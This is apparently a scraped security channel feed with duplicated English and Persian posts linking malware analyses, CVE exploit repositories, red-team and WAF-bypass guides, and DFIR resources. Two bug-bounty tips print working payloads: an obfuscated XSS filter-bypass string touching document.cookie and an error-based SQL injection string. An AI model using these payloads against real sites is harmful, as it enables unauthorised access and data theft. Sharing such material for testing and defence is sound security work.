Malware analysis
1. AndoryuBot
https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
2. AsyncRAT Loader
https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader
@Engineer_Computer
1. AndoryuBot
https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
2. AsyncRAT Loader
https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader
@Engineer_Computer
Fortinet Blog
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)
FortiGuard Labs details how a unique botnet leverages a Ruckus vulnerability and examines its behavior once inside an infected device. Learn more.…
exploit
1.CVE-2023-20052:
Information leak vulnerability in the DMG file parser of ClamAV
https://github.com/nokn0wthing/CVE-2023-25002
2. Exploits for CVE-2023-27327, CVE-2023-27328
(Parallels Desktop VM)
https://github.com/kn32/parallels-plist-escape
3. CVE-2023-28231:
DHCP Server RCE (2008 R2 SP1 - Server 2019)
https://github.com/glavstroy/CVE-2023-28231
@Engineer_Computer
1.CVE-2023-20052:
Information leak vulnerability in the DMG file parser of ClamAV
https://github.com/nokn0wthing/CVE-2023-25002
2. Exploits for CVE-2023-27327, CVE-2023-27328
(Parallels Desktop VM)
https://github.com/kn32/parallels-plist-escape
3. CVE-2023-28231:
DHCP Server RCE (2008 R2 SP1 - Server 2019)
https://github.com/glavstroy/CVE-2023-28231
@Engineer_Computer
GitHub
GitHub - nokn0wthing/CVE-2023-20052: CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV - nokn0wthing/CVE-2023-20052
Demystifying_Soft_Sec_Vulns.pdf
623.9 KB
Research
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Alert! 9 new ransomware families emerge from leaked Babuk source code, capable of targeting Linux and ESXi environments
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
Injecting Payload In Phone Numbers field !
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
XSS WAF Bypass using location concatenation:
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Some recent lessons learned:
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
⭕️ Building a Red Team Infrastructure in 2023
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#RedTeam
@Engineer_Computer
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#RedTeam
@Engineer_Computer
Systemsecurity
Building a Red Team Infrastructure in 2023
In this blog post an overview of the different components of a red team infrastructure is given. This includes explanations how these work, as well as the comparison of different solutions and their characteristics.
✨Three projects will help you a lot in Malware Analysis✨
✨سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند✨
1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#
کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.
3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/
این GTFOBins پروژهای است که توابع قانونی باینریهای یونیکس را جمعآوری میکند که میتوان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایلها، spawn bind و reverse shellها و تسهیل سایر وظایف پس از بهرهبرداری سوء استفاده کرد.
#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
✨سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند✨
1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#
کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.
3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/
این GTFOBins پروژهای است که توابع قانونی باینریهای یونیکس را جمعآوری میکند که میتوان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایلها، spawn bind و reverse shellها و تسهیل سایر وظایف پس از بهرهبرداری سوء استفاده کرد.
#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
🔰 دانستن اینکه چه چیزی در پردازش های ویندوز عادی است، به کاهش نویز در فرآیند جستجوی بدافزار احتمالی کمک میکند.
🔱 https://sansorg.egnyte.com/dl/oQm41D67D6
🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.
@Engineer_Computer
🔱 https://sansorg.egnyte.com/dl/oQm41D67D6
🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.
@Engineer_Computer
SANS-DFIR(iDeFense).pdf
1.9 MB
پوستر بالا رو هم از لینک بالا و هم از اینجا میتونید دانلود کنید.
@Engineer_Computer
@Engineer_Computer
How to bypass Cloudflare, Incapsula, SUCURI and another WAF
https://miloserdov.org/?p=2960
@Engineer_Computer
https://miloserdov.org/?p=2960
@Engineer_Computer
Threat Research
Outlook Patch Analysis Reveals Important Flaw in Windows API
https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
@Engineer_Computer
Outlook Patch Analysis Reveals Important Flaw in Windows API
https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
@Engineer_Computer
Akamai
From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API | Akamai
Akamai researchers explore a new critical vulnerability in Windows that could lead to a bypass of CVE-2023-23397’s mitigation.
#هوش_مصنوعی
یک وبسایت عالی، تبدیل متن به ویدئو با هوش مصنوعی میتونید سناریو بنویسید و
به کلیپ تبدیل كنيد و یا اینکه یک عکس رو بدید و بگید به چه صورت اجرا بشه ، فوق العادهس این ابزار
https://app.kaiber.ai/
@Engineer_Computer
یک وبسایت عالی، تبدیل متن به ویدئو با هوش مصنوعی میتونید سناریو بنویسید و
به کلیپ تبدیل كنيد و یا اینکه یک عکس رو بدید و بگید به چه صورت اجرا بشه ، فوق العادهس این ابزار
https://app.kaiber.ai/
@Engineer_Computer
👍1
Analysis_ITW_Linux_Implants.pdf
4 MB
Threat Research
Practical CTI Analysis Over 2022 ITW Linux Implants: Detection Over Blind Spots 2023
@Engineer_Computer
Practical CTI Analysis Over 2022 ITW Linux Implants: Detection Over Blind Spots 2023
@Engineer_Computer